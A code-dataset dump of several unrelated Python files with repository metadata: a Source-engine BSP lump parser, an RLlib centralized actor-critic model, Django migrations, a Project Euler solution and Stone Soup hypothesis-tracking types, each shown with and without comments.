model_name='practice',
name='weed_multipliers',
),
migrations.AddField(
model_name='practice',
name='weed_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
]
| true | true |
1c4a70d44d91648b29f794c7eba76c2e8bd1c7fa | 7,104 | py | Python | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 44 | 2018-07-06T04:44:02.000Z | 2022-03-27T02:18:37.000Z | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 18 | 2018-07-25T23:19:17.000Z | 2022-03-16T23:59:36.000Z | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 12 | 2019-09-13T21:52:51.000Z | 2022-03-22T18:04:21.000Z | # https://github.com/ValveSoftware/source-sdk-2013/blob/master/sp/src/public/bspfile.h
import enum
import io
import struct
from typing import List
from .. import base
from . import source
FILE_MAGIC = b"VBSP"
BSP_VERSION = 20 # NOTE: v20 Source BSPs differ widely, since many forks are of this version
GAME_PATHS = ["Day of Defeat: Source", # TODO: full path
"G String",
"Garry's Mod",
"Half-Life 2: Episode 2",
"Half-Life 2 Update",
"NEOTOKYO",
"Portal",
"Team Fortress 2"]
GAME_VERSIONS = {GAME: BSP_VERSION for GAME in GAME_PATHS}
class LUMP(enum.Enum):
ENTITIES = 0
PLANES = 1
TEXTURE_DATA = 2
VERTICES = 3
VISIBILITY = 4
NODES = 5
TEXTURE_INFO = 6
FACES = 7 # version 1
LIGHTING = 8 # version 1
OCCLUSION = 9 # version 2
LEAVES = 10 # version 1
FACE_IDS = 11 # TF2 branch, for mapping debug & detail prop seed
EDGES = 12
SURFEDGES = 13
MODELS = 14
WORLD_LIGHTS = 15
LEAF_FACES = 16
LEAF_BRUSHES = 17
BRUSHES = 18
BRUSH_SIDES = 19
AREAS = 20
AREA_PORTALS = 21
UNUSED_22 = 22
UNUSED_23 = 23
UNUSED_24 = 24
UNUSED_25 = 25
DISPLACEMENT_INFO = 26
ORIGINAL_FACES = 27
PHYSICS_DISPLACEMENT = 28
PHYSICS_COLLIDE = 29
VERTEX_NORMALS = 30
VERTEX_NORMAL_INDICES = 31
DISPLACEMENT_LIGHTMAP_ALPHAS = 32 # deprecated / X360 ?
DISPLACEMENT_VERTICES = 33
DISPLACEMENT_LIGHTMAP_SAMPLE_POSITIONS = 34
GAME_LUMP = 35
LEAF_WATER_DATA = 36
PRIMITIVES = 37
PRIMITIVE_VERTICES = 38 # deprecated / X360 ?
PRIMITIVE_INDICES = 39
PAKFILE = 40
CLIP_PORTAL_VERTICES = 41
CUBEMAPS = 42
TEXTURE_DATA_STRING_DATA = 43
TEXTURE_DATA_STRING_TABLE = 44
OVERLAYS = 45
LEAF_MIN_DIST_TO_WATER = 46
FACE_MACRO_TEXTURE_INFO = 47
DISPLACEMENT_TRIS = 48
PHYSICS_COLLIDE_SURFACE = 49 # deprecated / X360 ?
WATER_OVERLAYS = 50 # deprecated / X360 ?
LEAF_AMBIENT_INDEX_HDR = 51
LEAF_AMBIENT_INDEX = 52
LIGHTING_HDR = 53 # version 1
WORLD_LIGHTS_HDR = 54
LEAF_AMBIENT_LIGHTING_HDR = 55 # version 1
LEAF_AMBIENT_LIGHTING = 56 # version 1
XZIP_PAKFILE = 57 # deprecated / X360 ?
FACES_HDR = 58 # version 1
MAP_FLAGS = 59
OVERLAY_FADES = 60
UNUSED_61 = 61
UNUSED_62 = 62
UNUSED_63 = 63
# struct SourceBspHeader { char file_magic[4]; int version; SourceLumpHeader headers[64]; int revision; };
lump_header_address = {LUMP_ID: (8 + i * 16) for i, LUMP_ID in enumerate(LUMP)}
def read_lump_header(file, LUMP: enum.Enum) -> source.SourceLumpHeader:
file.seek(lump_header_address[LUMP])
offset, length, version, fourCC = struct.unpack("4I", file.read(16))
header = source.SourceLumpHeader(offset, length, version, fourCC)
return header
# a rough map of the relationships between lumps:
#
# /-> SurfEdge -> Edge -> Vertex
# Leaf -> Node -> Face -> Plane
# \-> DisplacementInfo -> DisplacementVertex
#
# ClipPortalVertices are AreaPortal geometry [citation neeeded]
# classes for each lump, in alphabetical order:
class Leaf(base.Struct): # LUMP 10
"""Endpoint of a vis tree branch, a pocket of Faces"""
contents: int # contents bitflags
cluster: int # index of this Leaf's cluster (parent node?) (visibility?)
area_flags: int # area + flags (short area:9; short flags:7;)
# area and flags are held in the same float
# area = leaf[2] & 0xFF80 >> 7 # 9 bits
# flags = leaf[2] & 0x007F # 7 bits
# TODO: automatically split area & flags, merging back for flat()
# why was this done when the struct is padded by one short anyway?
mins: List[float] # bounding box minimums along XYZ axes
maxs: List[float] # bounding box maximums along XYZ axes
first_leaf_face: int # index of first LeafFace
num_leaf_faces: int # number of LeafFaces
first_leaf_brush: int # index of first LeafBrush
num_leaf_brushes: int # number of LeafBrushes
leaf_water_data_id: int # -1 if this leaf isn't submerged
padding: int # should be empty
__slots__ = ["contents", "cluster", "area_flags", "mins", "maxs",
"first_leaf_face", "num_leaf_faces", "first_leaf_brush",
"num_leaf_brushes", "leaf_water_data_id", "padding"]
_format = "i8h4H2h"
_arrays = {"mins": [*"xyz"], "maxs": [*"xyz"]}
# classes for special lumps, in alphabetical order:
class PhysicsDisplacement(list): # LUMP 28
def __init__(self, raw_lump: bytes):
lump = io.BytesIO(raw_lump)
count = int.from_bytes(lump.read(2), "little")
data_sizes = list(*struct.unpack(f"{count}H", lump.read(count * 2)))
physics_data = list()
for size in data_sizes:
physics_data.append(lump.read(size))
super().__init__(physics_data)
def as_bytes(self) -> bytes:
count = len(self).to_bytes(2, "little")
sizes = map(lambda s: s.to_bytes(2, "little"), [len(d) for d in self])
return b"".join(count, *sizes, *self)
class StaticPropv10(base.Struct): # sprp GAME LUMP (LUMP 35)
origin: List[float] # origin.xyz
angles: List[float] # origin.yzx QAngle; Z0 = East
name_index: int # index into AME_LUMP.sprp.model_names
first_leaf: int # index into Leaf lump
num_leafs: int # number of Leafs after first_leaf this StaticPropv10 is in
solid_mode: int # collision flags enum
skin: int # index of this StaticProp's skin in the .mdl
fade_distance: List[float] # min & max distances to fade out
lighting_origin: List[float] # xyz position to sample lighting from
forced_fade_scale: float # relative to pixels used to render on-screen?
dx_level: List[int] # supported directX level, will not render depending on settings
flags: int # other flags
lightmap: List[int] # dimensions of this StaticProp's lightmap (GAME_LUMP.static prop lighting?)
__slots__ = ["origin", "angles", "name_index", "first_leaf", "num_leafs",
"solid_mode", "skin", "fade_distance", "lighting_origin",
"forced_fade_scale", "dx_level", "flags", "lightmap"]
_format = "6f3HBi6f2Hi2H"
_arrays = {"origin": [*"xyz"], "angles": [*"yzx"], "fade_distance": ["min", "max"],
"lighting_origin": [*"xyz"], "dx_level": ["min", "max"],
"lightmap": ["width", "height"]}
# {"LUMP_NAME": {version: LumpClass}}
BASIC_LUMP_CLASSES = source.BASIC_LUMP_CLASSES.copy()
LUMP_CLASSES = source.LUMP_CLASSES.copy()
LUMP_CLASSES.update({"LEAVES": {1: Leaf}})
SPECIAL_LUMP_CLASSES = source.SPECIAL_LUMP_CLASSES.copy()
GAME_LUMP_HEADER = source.GAME_LUMP_HEADER
# {"lump": {version: SpecialLumpClass}}
GAME_LUMP_CLASSES = source.GAME_LUMP_CLASSES.copy()
GAME_LUMP_CLASSES["sprp"].update({7: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10), # 7*
10: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10)})
methods = [*source.methods]
| 36.060914 | 106 | 0.657517 | import enum
import io
import struct
from typing import List
from .. import base
from . import source
FILE_MAGIC = b"VBSP"
BSP_VERSION = 20
GAME_PATHS = ["Day of Defeat: Source", "G String",
"Garry's Mod",
"Half-Life 2: Episode 2",
"Half-Life 2 Update",
"NEOTOKYO",
"Portal",
"Team Fortress 2"]
GAME_VERSIONS = {GAME: BSP_VERSION for GAME in GAME_PATHS}
class LUMP(enum.Enum):
ENTITIES = 0
PLANES = 1
TEXTURE_DATA = 2
VERTICES = 3
VISIBILITY = 4
NODES = 5
TEXTURE_INFO = 6
FACES = 7 # version 1
LIGHTING = 8 # version 1
OCCLUSION = 9 # version 2
LEAVES = 10 # version 1
FACE_IDS = 11 # TF2 branch, for mapping debug & detail prop seed
EDGES = 12
SURFEDGES = 13
MODELS = 14
WORLD_LIGHTS = 15
LEAF_FACES = 16
LEAF_BRUSHES = 17
BRUSHES = 18
BRUSH_SIDES = 19
AREAS = 20
AREA_PORTALS = 21
UNUSED_22 = 22
UNUSED_23 = 23
UNUSED_24 = 24
UNUSED_25 = 25
DISPLACEMENT_INFO = 26
ORIGINAL_FACES = 27
PHYSICS_DISPLACEMENT = 28
PHYSICS_COLLIDE = 29
VERTEX_NORMALS = 30
VERTEX_NORMAL_INDICES = 31
DISPLACEMENT_LIGHTMAP_ALPHAS = 32 # deprecated / X360 ?
DISPLACEMENT_VERTICES = 33
DISPLACEMENT_LIGHTMAP_SAMPLE_POSITIONS = 34
GAME_LUMP = 35
LEAF_WATER_DATA = 36
PRIMITIVES = 37
PRIMITIVE_VERTICES = 38 # deprecated / X360 ?
PRIMITIVE_INDICES = 39
PAKFILE = 40
CLIP_PORTAL_VERTICES = 41
CUBEMAPS = 42
TEXTURE_DATA_STRING_DATA = 43
TEXTURE_DATA_STRING_TABLE = 44
OVERLAYS = 45
LEAF_MIN_DIST_TO_WATER = 46
FACE_MACRO_TEXTURE_INFO = 47
DISPLACEMENT_TRIS = 48
PHYSICS_COLLIDE_SURFACE = 49 # deprecated / X360 ?
WATER_OVERLAYS = 50 # deprecated / X360 ?
LEAF_AMBIENT_INDEX_HDR = 51
LEAF_AMBIENT_INDEX = 52
LIGHTING_HDR = 53 # version 1
WORLD_LIGHTS_HDR = 54
LEAF_AMBIENT_LIGHTING_HDR = 55 # version 1
LEAF_AMBIENT_LIGHTING = 56 # version 1
XZIP_PAKFILE = 57 # deprecated / X360 ?
FACES_HDR = 58 # version 1
MAP_FLAGS = 59
OVERLAY_FADES = 60
UNUSED_61 = 61
UNUSED_62 = 62
UNUSED_63 = 63
# struct SourceBspHeader { char file_magic[4]; int version; SourceLumpHeader headers[64]; int revision; };
lump_header_address = {LUMP_ID: (8 + i * 16) for i, LUMP_ID in enumerate(LUMP)}
def read_lump_header(file, LUMP: enum.Enum) -> source.SourceLumpHeader:
file.seek(lump_header_address[LUMP])
offset, length, version, fourCC = struct.unpack("4I", file.read(16))
header = source.SourceLumpHeader(offset, length, version, fourCC)
return header
# a rough map of the relationships between lumps:
#
# /-> SurfEdge -> Edge -> Vertex
# Leaf -> Node -> Face -> Plane
# \-> DisplacementInfo -> DisplacementVertex
#
# ClipPortalVertices are AreaPortal geometry [citation neeeded]
# classes for each lump, in alphabetical order:
class Leaf(base.Struct): # LUMP 10
contents: int # contents bitflags
cluster: int # index of this Leaf's cluster (parent node?) (visibility?)
area_flags: int mins: List[float] maxs: List[float] first_leaf_face: int num_leaf_faces: int first_leaf_brush: int num_leaf_brushes: int leaf_water_data_id: int padding: int # should be empty
__slots__ = ["contents", "cluster", "area_flags", "mins", "maxs",
"first_leaf_face", "num_leaf_faces", "first_leaf_brush",
"num_leaf_brushes", "leaf_water_data_id", "padding"]
_format = "i8h4H2h"
_arrays = {"mins": [*"xyz"], "maxs": [*"xyz"]}
# classes for special lumps, in alphabetical order:
class PhysicsDisplacement(list): # LUMP 28
def __init__(self, raw_lump: bytes):
lump = io.BytesIO(raw_lump)
count = int.from_bytes(lump.read(2), "little")
data_sizes = list(*struct.unpack(f"{count}H", lump.read(count * 2)))
physics_data = list()
for size in data_sizes:
physics_data.append(lump.read(size))
super().__init__(physics_data)
def as_bytes(self) -> bytes:
count = len(self).to_bytes(2, "little")
sizes = map(lambda s: s.to_bytes(2, "little"), [len(d) for d in self])
return b"".join(count, *sizes, *self)
class StaticPropv10(base.Struct): # sprp GAME LUMP (LUMP 35)
origin: List[float] # origin.xyz
angles: List[float] # origin.yzx QAngle; Z0 = East
name_index: int # index into AME_LUMP.sprp.model_names
first_leaf: int # index into Leaf lump
num_leafs: int # number of Leafs after first_leaf this StaticPropv10 is in
solid_mode: int # collision flags enum
skin: int # index of this StaticProp's skin in the .mdl
fade_distance: List[float] lighting_origin: List[float] forced_fade_scale: float dx_level: List[int] flags: int lightmap: List[int] __slots__ = ["origin", "angles", "name_index", "first_leaf", "num_leafs",
"solid_mode", "skin", "fade_distance", "lighting_origin",
"forced_fade_scale", "dx_level", "flags", "lightmap"]
_format = "6f3HBi6f2Hi2H"
_arrays = {"origin": [*"xyz"], "angles": [*"yzx"], "fade_distance": ["min", "max"],
"lighting_origin": [*"xyz"], "dx_level": ["min", "max"],
"lightmap": ["width", "height"]}
# {"LUMP_NAME": {version: LumpClass}}
BASIC_LUMP_CLASSES = source.BASIC_LUMP_CLASSES.copy()
LUMP_CLASSES = source.LUMP_CLASSES.copy()
LUMP_CLASSES.update({"LEAVES": {1: Leaf}})
SPECIAL_LUMP_CLASSES = source.SPECIAL_LUMP_CLASSES.copy()
GAME_LUMP_HEADER = source.GAME_LUMP_HEADER
# {"lump": {version: SpecialLumpClass}}
GAME_LUMP_CLASSES = source.GAME_LUMP_CLASSES.copy()
GAME_LUMP_CLASSES["sprp"].update({7: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10), # 7*
10: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10)})
methods = [*source.methods]
| true | true |
1c4a711bd8237da25790895bd0df02e797b5f2e6 | 5,306 | py | Python | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | null | null | null | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | null | null | null | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | 1 | 2022-03-31T02:14:09.000Z | 2022-03-31T02:14:09.000Z | import numpy as np
from collections import OrderedDict
from typing import List, Dict
from gym import spaces
from ray.rllib.utils.framework import try_import_tf, get_activation_fn
from ray.rllib.utils.annotations import override
from ray.rllib.utils.types import ModelConfigDict, TensorType
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.preprocessors import get_preprocessor
import tensorflow as tf
tf1, tf, tf_version = try_import_tf()
class CentralizedActorCriticModel(TFModelV2):
CRITIC_OBS = "critic_obs"
def __init__(
self,
obs_space: spaces.Space,
action_space: spaces.Space,
num_outputs: int,
model_config: ModelConfigDict,
name: str,
):
super(CentralizedActorCriticModel, self).__init__(
obs_space, action_space, num_outputs, model_config, name
)
model_config = model_config["custom_model_config"]
self.n_agents = model_config["agent_number"]
if model_config["critic_mode"] == "mean":
self.critic_obs = spaces.Dict(
OrderedDict(
{
"own_obs": self.obs_space,
"own_act": self.action_space,
"oppo_act": self.action_space,
}
)
)
else:
self.critic_obs = spaces.Dict(
OrderedDict(
{
**{f"AGENT-{i}": self.obs_space for i in range(self.n_agents)},
**{
f"AGENT-{i}-action": self.action_space
for i in range(self.n_agents)
},
}
)
)
self.critic_preprocessor = get_preprocessor(self.critic_obs)(self.critic_obs)
self.obs_preprocessor = get_preprocessor(self.obs_space)(self.obs_space)
self.act_preprocessor = get_preprocessor(self.action_space)(self.action_space)
self.action_model = self._build_action_model(model_config["action_model"])
self.value_model = self._build_value_model(model_config["value_model"])
self.register_variables(self.action_model.variables)
self.register_variables(self.value_model.variables)
def _build_action_model(self, model_config: ModelConfigDict):
"""Build action model with model configuration
model_config = {'activation': str, 'hiddens': Sequence}
"""
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.obs_preprocessor.shape),), name="policy-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
logits_out = tf.keras.layers.Dense(
self.num_outputs,
name="logits_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [logits_out])
def _build_value_model(self, model_config: ModelConfigDict):
"""Build value model with given model configuration
model_config = {'activation': str, 'hiddens': Sequence}
"""
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.critic_preprocessor.shape),), name="value-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
value_out = tf.keras.layers.Dense(
1,
name="value_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [value_out])
@override(ModelV2)
def forward(
self,
input_dict: Dict[str, TensorType],
state: List[TensorType],
seq_lens: TensorType,
) -> (TensorType, List[TensorType]):
# obs = self.obs_preprocessor.transform(input_dict["obs"])
logits_out = self.action_model(input_dict["obs_flat"])
return logits_out, state
def central_value_function(self, critic_obs):
# Dict({obs, action})
# critic_obs = self.critic_preprocessor.transform(critic_obs)
self._value_out = self.value_model(critic_obs)
return tf.reshape(self._value_out, [-1])
@override(ModelV2)
def value_function(self) -> TensorType:
return tf.reshape(self._value_out, [-1])
ModelCatalog.register_custom_model("CAC", CentralizedActorCriticModel)
| 35.851351 | 87 | 0.613456 | import numpy as np
from collections import OrderedDict
from typing import List, Dict
from gym import spaces
from ray.rllib.utils.framework import try_import_tf, get_activation_fn
from ray.rllib.utils.annotations import override
from ray.rllib.utils.types import ModelConfigDict, TensorType
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.preprocessors import get_preprocessor
import tensorflow as tf
tf1, tf, tf_version = try_import_tf()
class CentralizedActorCriticModel(TFModelV2):
CRITIC_OBS = "critic_obs"
def __init__(
self,
obs_space: spaces.Space,
action_space: spaces.Space,
num_outputs: int,
model_config: ModelConfigDict,
name: str,
):
super(CentralizedActorCriticModel, self).__init__(
obs_space, action_space, num_outputs, model_config, name
)
model_config = model_config["custom_model_config"]
self.n_agents = model_config["agent_number"]
if model_config["critic_mode"] == "mean":
self.critic_obs = spaces.Dict(
OrderedDict(
{
"own_obs": self.obs_space,
"own_act": self.action_space,
"oppo_act": self.action_space,
}
)
)
else:
self.critic_obs = spaces.Dict(
OrderedDict(
{
**{f"AGENT-{i}": self.obs_space for i in range(self.n_agents)},
**{
f"AGENT-{i}-action": self.action_space
for i in range(self.n_agents)
},
}
)
)
self.critic_preprocessor = get_preprocessor(self.critic_obs)(self.critic_obs)
self.obs_preprocessor = get_preprocessor(self.obs_space)(self.obs_space)
self.act_preprocessor = get_preprocessor(self.action_space)(self.action_space)
self.action_model = self._build_action_model(model_config["action_model"])
self.value_model = self._build_value_model(model_config["value_model"])
self.register_variables(self.action_model.variables)
self.register_variables(self.value_model.variables)
def _build_action_model(self, model_config: ModelConfigDict):
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.obs_preprocessor.shape),), name="policy-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
logits_out = tf.keras.layers.Dense(
self.num_outputs,
name="logits_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [logits_out])
def _build_value_model(self, model_config: ModelConfigDict):
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.critic_preprocessor.shape),), name="value-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
value_out = tf.keras.layers.Dense(
1,
name="value_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [value_out])
@override(ModelV2)
def forward(
self,
input_dict: Dict[str, TensorType],
state: List[TensorType],
seq_lens: TensorType,
) -> (TensorType, List[TensorType]):
logits_out = self.action_model(input_dict["obs_flat"])
return logits_out, state
def central_value_function(self, critic_obs):
self._value_out = self.value_model(critic_obs)
return tf.reshape(self._value_out, [-1])
@override(ModelV2)
def value_function(self) -> TensorType:
return tf.reshape(self._value_out, [-1])
ModelCatalog.register_custom_model("CAC", CentralizedActorCriticModel)
| true | true |
1c4a7170b0fa8e60f08719c553b8346bac8ea857 | 525 | py | Python | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 18 | 2017-08-12T06:57:27.000Z | 2022-03-17T18:55:04.000Z | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 18 | 2017-03-25T04:39:23.000Z | 2021-07-07T13:18:38.000Z | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 8 | 2017-03-02T14:00:02.000Z | 2020-03-21T08:29:17.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("asymmetric_jwt_auth", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="publickey",
name="comment",
field=models.CharField(
max_length=100, help_text="Comment describing this key", default=""
),
preserve_default=False,
),
]
| 22.826087 | 83 | 0.586667 | from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("asymmetric_jwt_auth", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="publickey",
name="comment",
field=models.CharField(
max_length=100, help_text="Comment describing this key", default=""
),
preserve_default=False,
),
]
| true | true |
1c4a7192efc324ef4cc55befd164bd83b94f86a8 | 342 | py | Python | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | # 26
def getRecurLen(n):
seq = {}
rem = 1 % n
i = 1
while(rem not in seq):
seq[rem] = i
rem = (10 * rem) % n
if rem == 0:
return 0
i += 1
return len(seq) - seq[rem] + 1
rec = 0
for d in range(1, 1000):
n = getRecurLen(d)
if n > rec:
rec = d
print(rec)
| 13.68 | 34 | 0.421053 |
def getRecurLen(n):
seq = {}
rem = 1 % n
i = 1
while(rem not in seq):
seq[rem] = i
rem = (10 * rem) % n
if rem == 0:
return 0
i += 1
return len(seq) - seq[rem] + 1
rec = 0
for d in range(1, 1000):
n = getRecurLen(d)
if n > rec:
rec = d
print(rec)
| true | true |
1c4a71fe54c3b911852677cd9a5459e70d22fa8e | 7,860 | py | Python | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | 1 | 2021-12-02T00:17:21.000Z | 2021-12-02T00:17:21.000Z | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | null | null | null | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
class MultipleHypothesis(Type, Sized, Iterable, Container):
"""Multiple Hypothesis base type
A Multiple Hypothesis is a container to store a collection of hypotheses.
"""
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
# check if 'single_hypotheses' contains any SingleHypotheses with
# Detection matching 'index'
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses with
# Prediction matching 'index'
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses
# matching 'index'
if isinstance(index, SingleHypothesis):
return index in self.single_hypotheses
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
# retrieve SingleHypothesis by array index
if isinstance(index, int):
return self.single_hypotheses[index]
# retrieve SingleHypothesis by measurement
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
# retrieve SingleHypothesis by prediction
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
"""Multiple composite hypothesis type
A Multiple Composite Hypothesis is a container to store a collection of composite hypotheses.
Interfaces the same as MultipleHypothesis, but permits different input, hence methods are
redefined.
"""
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
# cannot check instance index is detection or prediction as composite hypotheses create
# their own composite detections and predictions
# check if 'single_hypotheses' contains any CompositeHypotheses matching 'index'
# use `is` as standard list __contains__ checks for equality which may not work in cases
# where hypotheses do not all share same attributes
if isinstance(index, CompositeHypothesis):
return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
# this will NOT affect the probabilities of each composite hypothesis' sub-hypotheses
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
| 38.719212 | 99 | 0.663232 | from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
